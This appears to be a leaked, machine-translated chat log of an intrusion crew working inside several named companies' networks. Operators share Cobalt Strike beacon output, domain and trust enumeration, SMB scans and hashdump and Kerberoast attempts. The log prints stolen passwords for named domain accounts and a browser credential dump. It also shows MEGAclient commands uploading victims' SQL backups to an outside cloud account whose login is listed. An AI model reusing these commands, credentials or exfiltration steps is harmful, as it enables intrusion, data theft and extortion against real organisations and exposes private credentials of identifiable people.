``Where did you find webroute access not YES? they administer under LA only in kerbaha nowhere YES? yeah dunno. now 10 active. i think i went through all the available pk on the available? and yes, i can not go out of the local network and i can not take the yes? and you have already found the admin? ah, no))) i also have a webrout stoit you already found the admin in the second network? and you have not mixed up the group? no. neighborxox threw from the car polzak where did you take access?
```
--- Chromium Credential (User: ndmicjsater) ---
URL : https://my.webrootanywhere.com/default.aspx
Username : jasons@leadingedgeequip.com
Password : jsateren8726

```
but there still asks for confirmation code 2FAtry through RDPoping. went through smb_login - among those where the codes fit there are 2 servers with open RDP.pinging the list of servers, for the following smb login ``.
beacon> shell wmic /NODE:172.31.190.103 /privileges:enable OS GET Name,OSArchitecture
[*] Tasked beacon to run: wmic /NODE:172.31.190.103 /privileges:enable OS GET Name,OSArchitecture
[+] host called home, sent: 104 bytes
[+] received output:
Node - 172.31.190.103

ERROR:

Description = The RPC server is unavailable.


\remote-exec wmi 172.31.190.103 rundll32 \\172.31.190.103\testvolume\GH-GHNS-DHS_Copy\office365\mui.dll entryPoint\remote-exec all three methodsa run how?[ ](https://mediaeveryone.com/group/snpartners-com?msg=apMHH3c8mKdEeZrMmh) Well on NAS it is not wind most likely )) no, maybe you can put it in the group yes? about failed to start the dll ie? do not change the passwords on the other is just a user. on NAS to start the dll did not work. He has rights to change passwords, as I understand it. Is there any way to use this?[ ](https://mediaeveryone.com/group/snpartners-com?msg=4pFWzF5wGgrJ9usov) and there are no other accesses?
```
Username : nddevbernst
Password : NDleading2021!
``only to custom ones. some to the aggressor whale
could you send me a link to a netlogon that worked and the admin above is nowhere to be found? i need to duplicate it in the confuscha let me duplicate it again, i lost the 445 port results file what kind of pc? all sannets from the adfind on /24 scanned, only 3-4 computers in the game did you look for vg and external backups? in spns is hyper-v replica service on several machines, this is the maximum i saw

0 trusts
37 servers
1205 armies
i think if you pinged it, it would be much less and how many servers, armies and trusts us, i looked there, iscsi is empty
there's ehs, no creed
there are two servers
bgukhoveam there's a tiny bit of .bco-shares
bally44backup there's a lot of backups

nothing else found a la wsphere, hypervisors, etc[ ](https://mediaeveryone.com/channel/general?msg=zbgfwydjaxhwyWEwu) any signs of cloud solutions? let's complicate the process today, let's check the WOL. then write to the group the number of pcs, arms and trustschromium admins, chromium all polozakonea, ran through all computers where admins sat yesterday then today we close, admins surely had no hints of claud or vg on backups?yes[ ](https://mediaeveryone.com/channel/general?msg=WGerCebrheZx2Wd3o) there are all found, what do I need? found one more guy, his credentials do not bring up a session on three computers. i remove the credentials from them via CME[ ](https://mediaeveryone.com/channel/general?msg=TQsXdkctah9AnbJNo) the same thing
There are a couple of subnets left to scan.
so far nothing in bellimore still in search of the creeds from the echyotr write down, what are your results? in preparation for closing in balimorladno, clarified. if you are done with the lab go to the networks[ ](https://mediaeveryone.com/channel/general?msg=HMAxxaonYPKBkydbG) 3 days ago I tried to build a server, at what time do not remember. fuck.... I'm already confused on all sides.or am I misunderstanding? just not setting up and building the server so you were still busy with lab 3 days ago? for lab, should have been but nothing started on it. I put it aside, it's at my desk. Then I brought a different office on it started up and now it's spinning. Do you want me to describe the hardware? [ ](https://mediaeveryone.com/channel/general?msg=5ywWviKNjaaKB8v2B) and this [ ](https://mediaeveryone.com/channel/general?msg=NMJXZRRGGaRR3RnGr) + [ ](https://mediaeveryone.com/channel/general?msg=FvaSSFmTR9MEnhQP6) I already saw it, it's just 16 minutes on the 22nd, counted as three days[ ](https://mediaeveryone.com/channel/general?msg=cxkivPJYBETLt6ffr) pieced together = assembled? What kind of server? 100% Yesterday today I did lab, I can't tell you. Before that I was piecing a server on a Chinese mother that does not fuckin' work! that was three days ago. so yesterday and today? yeah, yesterday. not much sleep. i don't remember what happened three days ago.

I sign up uni yesterday yesterdayrahm, maybe I'm already confused uni it was yesterday ? gave you an individual problem on the vpn like, which then @user7 left, strong strong and so on)you said that the lab I remember the day before yesterday I asked you to work on the net finished about 10 minutes ago. Do not count in hours. I think since yesterday, wrote to you. how much time was busy with this task?
Finished with webmords, doesn't take much off
found:
1 ushi (no creeds)
1 us (no kreds)
iLO 4 ProLiant
iLO 54 ProLiant
the last two things have not figured out what they are, and no Credits
iLO 4 ProLiant 54 ProLiant not yet figured out what they are, well, there are no Credits
main.crispregional.org
```
also looking for hints on the backups in the vg and the cloudswrite at the same time, that on the tasks of all, let's move on to the main tasks thank you tell me that he has 10 minutes to contact the boss promptly call pliz @ot let him answer bosu and here we are all trying to make sense of this situation if not then it turns out that @ot himself checked, none of us have checked so, aware of this kitchen were only @ot and @user3 no) and you sent them to check?what's the problem with the tests? we don't know about it, only @ot does. ask the others about the tests - @ot
tests - I don't know
lab - @ot and @user3
the last one is closed, @user3 was busy configuring it so in order, who did the interviews, tests, labs maybe someone will have problems depending on your answers)okay, never mind, what do you mean by that? and i also talk about tests and labs we talk about the tests and the interviews specifically labs i mean what works with it, from what i observe, @user3 and tests who checked?@ot who conducted the interviews? so? so she rather under the direction of @user3 over which @user3 still works eeetu labaa)ot2 is it who you know about the lab, tests and other things under the direction of @ot? distracted yet? then they immediately 1 dk and picked up the same pdkvot 1 dktakta all ok?
List of DCs in Domain
    \\WDC1 (PDC)
``I did
`shell nltest /dclist`
without `:````
beacon> shell nltest /dclist:
[*] Tasked beacon to run: nltest /dclist:
[+] host called home, sent: 46 bytes
[+] received output:
Get list of DCs in domain '' from '\\WWDC1.waterway.com'.
You don't have access to DsBind to (\\WWDC1.waterway.com) (Trying NetServerEnum).
List of DCs in Domain
    \\WDC1 (PDC)
The command completed successfully

``shell nltest /dclist:````
beacon> shell net accounts
[*] Tasked beacon to run: net accounts
[+] host called home, sent: 43 bytes
[+] received output:
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 90
Minimum password length: 6
Length of password history maintained: 10
Lockout threshold: 15
Lockout duration (minutes): 5
Lockout observation window (minutes): 5
Computer role: WORKSTATION
The command completed successfully.
``nltest output
beacon> net domain
waterway.com

beacon> net domain_controllers
Domain Controllers:
[-] Error: 0

beacon> shell nltest /dclist:waterway.com
Get list of DCs in domain 'waterway.com' from '\\\WWDC1.waterway.com'.
Cannot DsBind to waterway.com (\\WWDC1.waterway.com).Status = 1722 0x6ba RPC_SERVER_UNAVAILABLE
I_NetGetDCList failed: Status = 6118 0x17e6 ERROR_NO_BROWSER_SERVERS_FOUND

beacon> shell net accounts /dom
The request will be processed at a domain controller for domain waterway.com.
System error 5 has occurred.
Access is denied.
``but just throw in the slip commands slipkbut check if the domain is alive or not)``with waterway 2 sessions sleeping#ballymoregroup-com
found ESXi, no credits yet
checked all my DA's with sniper - they are sitting on servers, in chrome only one had password without username from unopened snout
Checking of scanned interfaces is in process.
sniper check all sysadmins and i.t. guys in the process I have a couple of sessions in the slipway, the water I have not seen nimble here, hashes are different, but not valid nimble is dead? all empty? not even hashes are different? 6 Computers where he was with the rights pulled and in them for now and stay. la was you did not have YES? hashes gave tl2 so far nothing interesting, other than what I wrote in the conf, did not findKred still not found, run the invey and caught some interesting information - the assumption that previously found seven in the yr and not in the domain looks reasonable, because found several other similar compounds. Scan the subnets to 445 443 22 80. Search the files on the computers where you have access to do not forget the cloud solutions.
main.crispregional.org
```
There is a sphere, av, backups
Looking for backups in the groups in `CORP.TELEVISA.COM.MX` I`ve jumped into `CORPSFECRT04` there is nothing on the creeds, now I'll go further untwisted Write down the status of work to get there. like any creeds fit there, but only as a normal polozaki maybe something like that : //www.zoller.info/en/products/tool-management/storage-systems/keeper) and what the drill can not kill? yeah hz. they sell weapons, and these drills assumption : //www.zoller.info/en/home?r=1```
10.0.0.24 0EA78803 [Win Embedded Standard 7601 SP 1]

Probably because it's some kind of cut-up sevens but you need prufy as a variant - that's the name of the title inrssu.com looking for the rights creeds. While I was looking for found ``.
 (platform: 500 version: 6.1 name: 0EA78803 domain: ZOLLER)
``and now looking for confirmation of a second domain, who works with it? access and other stuff, and looking for external, internal storage, and the quality of the locale itself, we'll give up on that about creating backups
looking for backups, auth, then listings skul, mail, filescredits only no backups found#ballymoregroup-com
check the web muzzles that naskanii naskanii write what are you doing? in another) push @user7 into the confab to see where everyone is at? hello:space_invader:everyone say goodbye until tomorrow it is mandatory items + cloud check backups in vorkgroups tomorrow will close a couple of networks and tomorrow by 6 pm will finalize `benihana.com
starting user is neutered, kerbs are removed, hell is removed, ShareFinder is dropped

`ballymoregroup.com
found 2 nasa, one dead
2 backup servers found, listings made
2 exch of hell not pinging `Ping request could not find host`
pinging whines in the process
LA starter user on several machines. Went everywhere took off browsers, hashdump and mimic. From all of this found two different hashes YES, but apparently old. No Kerbs - writes something like ``[X] No users found to Kerberoast!
``````
main.crispregional.org
```
What's left:
backups to find, optionally AV tomorrow by 4 I think half an hour more, what are we up to today?
```
	main.crispregional.org 10.1.20.213 SYSTEM * PROVATIONTEST
``that's what kind of silent excitermelanu and all and alive so I keeled it a long time ago better spawn it? why should it die in the first place it won't die do a better spawn first do a spawn kill the session will die
psinject 4728 x86 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt
````CheckShareAccess` ?
ERROR: Invoke-ShareFinder : A parameter cannot be found that matches parameter name 'checkaccess'.
``where is the -checkaccess flag wev beacon> psinject 4540 x64 Invoke-ShareFinder I also wondered if it shows access balls, not just enum balls? ah, it's for that message) yeah, I don't know)) I thought roll call is to whom and where?sccy.com it turns out...no big deal, it turns out? not a wrong password? it says access denied it if you're talking about the sharfinder output there above look it up, access denied
they have a lockout after 5 failed, i think how not to break it with the admin-not yet out of the point?
beacon> shell MEGAclient.exe put -q --ignore-quota-warn F:\SQLBackup\*.bak
[*] Tasked beacon to run: MEGAclient.exe put -q --ignore-quota-warn F:\SQLBackup\*.bak
[+] host called home, sent: 91 bytes
[+] received output:
[API:err: 23:56:12] Unable to open local path: \\?\F:\SQLBackup\*.bak

beacon> shell MEGAclient.exe put -q --ignore-quota-warn \\\wwsql2\F$\SQLBackup\*.bak
[*] Tasked beacon to run: MEGAclient.exe put -q --ignore-quota-warn \\\wwsql2\\F$\SQLBackup\*.bak
[+] host called home, sent: 100 bytes
[+] received output:
[API:err: 23:56:38] Unable to open local path: \\?\\\wwsql2\F$\SQLBackup\*.bak

``Will it work?`` That's what I mean.
MEGAclient.exe put -q --ignore-quota-warn *.bak
No, it's not like all the backups will fit in there without archiving, but in MEGA you can put *hm in the filename
ztclmgplmwfqmcjqfn@wqcefp.com
745jkiJIGSFjer67
```
I'll upload it here.

`QfvqBgx767v14bn6c0JlKw` but you noticed it in general in the intranet they often work by looking at the keywordPDI_backup_2021_01_10_053001_4017258.bak
Intranet_backup_2021_01_10_053001_3704801.bak
ManagementInfo_backup_2021_01_10_053001_3861023.bak
Development_backup_2021_01_10_053001_3392249.bak
Financial_backup_2021_01_10_053001_3548530.bak
2гб28,398,080 CCC_backup_2021_01_10_053001_3079732.bak
28 meters``.
beacon> shell dir F:\SQLBackup
[*] Tasked beacon to run: dir F:\SQLBackup
[+] host called home, sent: 47 bytes
[+] received output:
 Volume in drive F is Data
 Volume Serial Number is 0E12-2B9D

 Directory of F:\SQLBackup

01/10/2021 10:00 PM <DIR> .
01/10/2021 10:00 PM <DIR> .
01/10/2021 05:30 AM 778,129,920 Analysis_backup_2021_01_10_053001_2923480.bak
01/10/2021 05:30 AM 8,176,882,176 Audit_backup_2021_01_10_053001_3079732.bak
01/10/2021 05:30 AM 28,398,080 CCC_backup_2021_01_10_053001_3079732.bak
01/10/2021 05:30 AM 398,543,360 Chemical_backup_2021_01_10_053001_3079732.bak
01/10/2021 05:30 AM 8,999,424 coupons_backup_2021_01_10_053001_3236000.bak
01/10/2021 05:31 AM 81,874,432 damage_backup_2021_01_10_053001_3236000.bak
01/10/2021 05:32 AM 9,034,617,344 datawarehouse_backup_2021_01_10_053001_3392249.bak
01/10/2021 05:31 AM 492,955,136 development_backup_2021_01_10_053001_3392249.bak
01/10/2021 05:34 AM 13,386,831,360 DRB_backup_2021_01_10_053001_3392249.bak
01/10/2021 05:47 AM 125,342,217,728 ElectronicJournals_backup_2021_01_10_053001_3548530.bak
01/10/2021 05:47 AM 1,747,013,120 Financial_backup_2021_01_10_053001_3548530.bak
01/10/2021 05:47 AM 485,575,168 Intranet_backup_2021_01_10_053001_3704801.bak
01/10/2021 05:47 AM 1,256,280,576 Inventory_backup_2021_01_10_053001_3704801.bak
01/10/2021 05:49 AM 12,605,082,112 Labor_backup_2021_01_10_053001_3704801.bak
01/10/2021 05:49 AM 28,398,080 ManagementInfo_backup_2021_01_10_053001_3861023.bak
01/10/2021 05:30 AM 4,024,832 master_backup_2021_01_10_053001_2142238.bak
01/10/2021 05:54 AM 2,821,808,640 Metabase_backup_2021_01_10_053001_4642233.bak
01/10/2021 05:30 AM 2,729,472 model_backup_2021_01_10_053001_2767253.bak
01/10/2021 05:50 AM 3,761,328,640 Morning_backup_2021_01_10_053001_3861023.bak
01/10/2021 05:30 AM 66,149,888 msdb_backup_2021_01_10_053001_2767253.bak
01/10/2021 05:50 AM 2,615,249,408 Payrolll_backup_2021_01_10_053001_3861023.bak
01/10/2021 05:50 AM 3,232,256 PDIPriceBook_backup_2021_01_10_053001_4017258.bak
01/10/2021 05:50 AM 1,482,774,016 PDI_backup_2021_01_10_053001_4017258.bak
01/10/2021 05/2021 05:52 AM 15,148,882,432 PLUHistory_backup_2021_01_10_053001_4173454.bak
01/10/2021 05:52 AM 1,110,528,512 POSInfo_backup_2021_01_10_053001_4173454.bak
01/10/2021 05:30 AM 8,479,232 ReportServerTempDB_backup_2021_01_10_053001_2923480.bak
01/10/2021 05:30 AM 118,684,160 ReportServer_backup_2021_01_10_053001_2767253.bak
01/10/2021 05:52 AM 3,430,912 Scorecard_Settings_backup_2021_01_10_053001_4173454.bak
01/10/2021 05:53 AM 1,074,877,952 Shared_backup_2021_01_10_053001_4329699.bak
01/10/2021 05:53 AM 11,357,211,136 specialty_backup_2021_01_10_053001_4329699.bak
01/10/2021 05:53 AM 705,843,712 SQI_backup_2021_01_10_053001_4329699.bak
01/10/2021 05:53 AM 2,021,739,008 Swipe_backup_2021_01_10_053001_4485967.bak
01/10/2021 05:54 AM 24,244,736 Test_backup_2021_01_10_053001_4642233.bak
01/10/2021 05:53 AM 242,305,536 Tips_backup_2021_01_10_053001_4485967.bak
01/10/2021 05:53 AM 4,738,560 WWBackOffice_backup_2021_01_10_053001_4642233.bak
              35 File(s) 216,430,061,056 bytes
               2 Dir(s) 787,610,132,480 bytes free
``Then pick one of your choice from the list above. Won`t you get burnt again? I`d take them.
WWSQL.waterway.com
CCC 15549
CCCDenver 10




WWSQL2.waterway.com
name
-------------------------------------------------------------------------------------------------------------------------------- -----------
Analysis 824
datawarehouse 12105
development 620
DRB 24028
Financial 1676
Payroll 2633
POSInfo 1272



PDIPRODSQL.waterway.com
name
-------------------------------------------------------------------------------------------------------------------------------- -----------
PDICompany_1137_01 43320

``[ ](https://mediaeveryone.com/group/waterway-com?msg=h52pqMWzd3NZ66geo) these backups, what databases to unload? ladies, what are we talking about? with databases@tl1 and what is the resultFinancial
Development[ ](https://mediaeveryone.com/group/waterway-com?msg=JGmFk2598zma3v55v) these are interesting. Which ones to export and upload?
there are no listings backupagatak there's even a prefix old, they were rubbed and that's it, why are we stopping at it as much as I have encountered, there's an anchorable until you find a subnet in which the loss > 0% there also an anchorable from other subnets pinged not, it means not pinged it rather 100% loss than anchorahahaha it's like @user7 had 40 servers on hell, but alive 70[ ](https://mediaeveryonecom/group/waterway-com?msg=9euTBxfTrFDYCn8s4) is like 15 out of 10[ ](http://mediaeveryone.com:3000/group/waterway-com?msg=favdnjaS7YHBZPuvT) I did
shell netstat -abn and look on what port processes sqlservr, sqlwriter are running on and there's just no pings for me over 100% lossd well here are two that aren't pinged just with the prefix old
and the other two with closed ports `Destination host unreachable.
Teemo[WWDC2]SYSTEM */628|2021Jan15 02:00:34> shell ping WWSQLOLD -n 1
[*] Tasked beacon to run: ping WWSQLOLD -n 1
[+] host called home, sent: 49 bytes
[+] received output:

Pinging WWSQLOLD.waterway.com [192.168.0.37] with 32 bytes of data:
Reply from 192.168.0.222: Destination host unreachable.

Ping statistics for 192.168.0.37:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

Teemo[WWDC2]SYSTEM */628|2021Jan15 02:01:03> shell ping WWSQL2Old -n 1
[*] Tasked beacon to run: ping WWSQL2Old -n 1
[+] host called home, sent: 50 bytes
[+] received output:

Pinging WWSQL2Old.waterway.com [192.168.0.83] with 32 bytes of data:
Reply from 192.168.0.222: Destination host unreachable.

Ping statistics for 192.168.0.83:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

``````
Teemo[WWDC2]SYSTEM */628|2021Jan15 01:59:00> shell ping PDITESTSQL -n 1
[*] Tasked beacon to run: ping PDITESTSQL -n 1
[+] host called home, sent: 51 bytes
[+] received output:

Pinging PDITESTSQL.waterway.com [192.168.0.127] with 32 bytes of data:
Reply from 192.168.0.127: bytes=32 time=1ms TTL=128

Ping statistics for 192.168.0.127:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 1ms, Maximum = 1ms, Average = 1ms

Teemo[WWDC2]SYSTEM */628|2021Jan15 01:59:21> shell ping wwsql02 -n 1
[*] Tasked beacon to run: ping wwsql02 -n 1
[+] host called home, sent: 48 bytes
[+] received output:

Pinging wwsql02.waterway.com [192.168.0.59] with 32 bytes of data:
Reply from 192.168.0.59: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.0.59:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

are they not pinging? haven't you tried those from other segments?
or those ports are closed?) and on these and do not get in without smb and rdps other network segments? yes, i.e. the servers can not go to? @user8 how to find a skull server two off
and two (PDITESTSQL,wwsql02) do not see anything, no ports 1433,445,3389,139
WWSQL.waterway.com
name
-------------------------------------------------------------------------------------------------------------------------------- -----------
AppSettings 14
AuthorizeNet 3736
CCC 15549
CCCDenver 10
Donations 30
Fundraising 14
GravityForms 903
HotSchedules 39
LocalMarketing 12
Loyalty 201
Silverpop 2993
Timeclock 9298
WooCommerce 104

(13 rows affected)



WWSQL2.waterway.com
name
-------------------------------------------------------------------------------------------------------------------------------- -----------
Analysis 824
Audit 10825
CCC 29
Chemical 444
coupons 10
damage 87
datawarehouse 12105
Development 620
DRB 24028
ElectronicJournals 150418
Financial 1676
Intranet 3627
Inventory 1331
Labor 13508
ManagementInfo 30
Metabase 2708
Morning 4934
Payroll 2633
PDI 1522
PDIPriceBook 4
PLUHistory 15546
POSInfo 1272
ReportServer 31096
ReportServerTempDB 992
Scorecard_Settings 4
Shared 1084
Specialty 14329
SQI 1554
Swipe 5506
Test 453
Tips 263
WWBackOffice 6

(32 rows affected)



PDIPRODSQL.waterway.com
name
-------------------------------------------------------------------------------------------------------------------------------- -----------
PDI_Stage_1137_01 3130
PDI_Warehouse_1137_01 6829
PDICompany_1137_01 43320
PDICompany_1137_01_FRx 5
PDICompany_1137_91 34633
PDICompany_1137_91_FRx 4
PDICompany_1137_92 42048
PDICompany_1137_92_FRx 4
PDICompany_1137_93 35983
PDICompany_1137_93_FRx 4
PDICompany_1137_94 37376
PDICompany_1137_94_FRx 4
PDIFoundation_1137 82096
PDIMaster 238
ReportServer 37613
ReportServerTempDB 174

(16 rows affected)

``````
    WATERWAY\djarden MyNewPassword6
    WATERWAY\Quser pdiC1137qu!
    WATERWAY\Administrator 1853Gators
    WATERWAY\datavault Waterway727
    WATERWAY\domainrestore Waterway727
    WATERWAY\mapusatera Gators1853
    WATERWAY\veeam_admin 99Waterway
    WATERWAY\Applied Waterway99
    WATERWAY\DBunte Waterway99
    WATERWAY\gkeller Waterway76
    WATERWAY\SEnglert Waterway99!
    WATERWAY\blauer 11915Admin2179!
    WATERWAY\mharper LoveUnit14
``@user3@user9
```
WWSQL.waterway.com
WWSQL2.waterway.com
WWSQLOLD.waterway.com
WWSQL2Old.waterway.com
WWsql02.waterway.com
PDIPRODSQL.waterway.com
PDITESTSQL.waterway.com
``would like + listings where? take away there is a pst that is 1.png and a 6 gig pst of some itishpost still
a couple of pumped out all you got ready? ok, i'll yank the cc_data.mdf it would be nice to pick up their backups? what's not ready? hello):space_invader:dayyou're all set for tomorrow's slip and everything as usual by 11pm see everything else, mine is no longer fit for me? hello, everyone, hello
dn:CN=PANAVISION,CN=System,DC=panavision,DC=com
>whenCreated:2005/09/14-17:51:44 Mountain Daylight Time
>name: PANAVISION
>securityIdentifier: S-1-5-21-202912000-196093339-1136263860
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: PANAVISION
>trustType: 1 [Downlevel(1)
>trustAttributes: 4 [Quarantined-Domain(4)]
``a bh withdrew.``
fuck
i don't know...suddenly my lock aca was heard imperesnimu traststranimu how i then removed bhvisibly ldap queries are forbidden...weird
it should work
Using server: AUS-DCON-01.ap.panavision.com:3268
Directory: Windows Server 2012 R2

dn:CN=panavision.com,CN=System,DC=ap,DC=panavision,DC=com
>whenCreated: 2006/01/16-15:54:35 Pacific Daylight Time
>name: panavision.com
>securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=panavision.com,CN=System,DC=eu,DC=panavision,DC=com
>whenCreated: 2006/03/02-04:37:35 Pacific Daylight Time
>name: panavision.com
>securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=panavision.com,CN=System,DC=na,DC=panavision,DC=com
>whenCreated: 2005/09/14-16:50:01 Pacific Daylight Time
>name: panavision.com
>securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=PANAVISION,CN=System,DC=panavision,DC=com
>whenCreated: 2005/09/14-16:51:44 Pacific Daylight Time
>name: PANAVISION
>securityIdentifier: S-1-5-21-202912000-196093339-1136263860
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: PANAVISION
>trustType: 1 [Downlevel(1)
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=eu.panavision.com,CN=System,DC=panavision,DC=com
>whenCreated: 2006/03/02-04:33:06 Pacific Daylight Time
>name: eu.panavision.com
>securityIdentifier: S-1-5-21-2619205848-3123681340-272399168
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: eu.panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=sa.panavision.com,CN=System,DC=panavision,DC=com
>whenCreated: 2007/10/25-01:46:47 Pacific Daylight Time
>name: sa.panavision.com
>securityIdentifier: S-1-5-21-486547592-1649593982-2333919999
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: sa.panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=na.panavision.com,CN=System,DC=panavision,DC=com
>whenCreated: 2005/09/14-16:49:49 Pacific Daylight Time
>name: na.panavision.com
>securityIdentifier: S-1-5-21-4080305880-3103530751-2544733278
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: na.panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=ap.panavision.com,CN=System,DC=panavision,DC=com
>whenCreated: 2006/01/16-15:54:34 Pacific Daylight Time
>name: ap.panavision.com
>securityIdentifier: S-1-5-21-396909831-1571174283-2495636022
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ap.panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=panavision.com,CN=System,DC=sa,DC=panavision,DC=com
>whenCreated: 2007/10/25-01:47:46 Pacific Daylight Time
>name: panavision.com
>securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=LEEFILTERS.UK,CN=System,DC=panavision,DC=com
>whenCreated: 2018/09/25-16:33:19 Pacific Daylight Time
>name: LEEFILTERS.UK
>securityIdentifier: S-1-5-21-2580217452-235510033-4179086628
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: LEEFILTERS.UK
>trustType: 2 [UpLevel(2)
>trustAttributes: 24 [Transitive(8);Cross-Organization(16)]


10 Objects returned

``Well, I mean not in quarantine?
beacon> shell adfind.exe -b DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[*] Tasked beacon to run: adfind.exe -b DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[+] host called home, sent: 109 bytes
[+] received output:

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral

beacon> shell adfind.exe -b DC=PANAVISION -f "(objectcategory=person)" > ad_users.txt
[*] Tasked beacon to run: adfind.exe -b DC=PANAVISION -f "(objectcategory=person)" > ad_users.txt
[+] host called home, sent: 102 bytes
[+] received output:

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral

beacon> shell adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[*] Tasked beacon to run: adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[+] host called home, sent: 115 bytes
[+] received output:

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral

``````
>name: panavision.com
>name: PANAVISION
>name: eu.panavision.com
>name: sa.panavision.com
>name: na.panavision.com
>name: ap.panavision.com
>name: LEEFILTERS.UK
``Certain domain is in the trust? I think I got it right...I'm writing the parameter wrong?
beacon> shell adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[*] Tasked beacon to run: adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[+] host called home, sent: 115 bytes
[+] received output:

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral

``I don't understand what bhs has to do with the trusts? did you rubeustus put on the trusts? i mean this[ ](https://mediaeveryone.com/group/panavision-com?msg=F5ysCxAFokCmqCfmF) )and what does this have to do with bhs? i mean kerberostsnaught bhs all the trusts surveyed the domain composition? and you kerberosts trusts? khmg[vloli already acq YES locked))))0created also threwdanu in the first you went up yes? the problem with going to the truststhose things are
    DEN-DCON-02.na.panavision.com [DS] Site: Denver
    DEN-DCON-01.na.panavision.com [PDC] [DS] Site: Denver
    WDH-DCON-02.na.panavision.com [DS] Site: Woodland-Hills
The command completed successfully

=============================================

PDC
Alias name administrators
Comment Members can fully administer the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
DEN-DCON-01$
Domain Admins
PVRT\Enterprise Admins
PVRT\wmi.service
=============================================

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
#yromero adfs.admin Administrator
BackupMgr CZambrana_da exponential
it.deploy it.inventory jharris_da
mpatterson_ea orivera_da PKooiman_da
sanadmin SP_Admin SQLAgent
windchilladmin yromero_ea
pvna\#yromero V@ndals1974


=============================================

``There's an ahaYou here?`` I'll fucking explain if I start, it's more confusing, it's easier to actually read it.`` TrustDirection is not a power of attorney, read what I threw outhttp://www.harmj0y.net/blog/redteaming/the-trustpocalypse/так is essentially a two-way power of attorney?`http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/почему should that affect the trustAttributes?`>trustDirection: 3 [Inbound(1);Outbound(2)]````
dn:CN=PANAVISION,CN=System,DC=panavision,DC=com
>whenCreated:2005/09/14-16:51:44 Pacific Daylight Time
>name: PANAVISION
>securityIdentifier: S-1-5-21-202912000-196093339-1136263860
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: PANAVISION
>trustType: 1 [Downlevel(1)
>trustAttributes: 4 [Quarantined-Domain(4)]
``Can you explain this point?
beacon> shell ping -n 1 sa.panavision.com
[*] Tasked beacon to run: ping -n 1 sa.panavision.com
[+] host called home, sent: 58 bytes
[+] received output:

Pinging sa.panavision.com [192.168.64.50] with 32 bytes of data:
Request timed out.

Ping statistics for 192.168.64.50:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

``And I realized that we have no sa domain migrate to quarantine domain? how to google such questions? in 2 streamsada what did you scan? just range /24 ?too want to work) to the heart ... work, but I do not get up with the office tomorrow))) and you?) yes I am usually here until morninga what do you do not sleep? not thick, 2 pcs ?
[*] 10.100.7.15:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:required) (uptime:3w 0d 14h 29m 10s) (guid:{ce3aadf5-49db-4506-983e-b24acd38dfd6}) (authentication domain:PVRT)
[+] 10.100.7.15:445 - Host is running Windows 2016 Standard (build:14393) (name:GBL-DCON-01) (authentication domain:PVRT)
[*] 10.100.7.16:445 - Force SMB1 since SMB fingerprint needs native_lm/native_os information
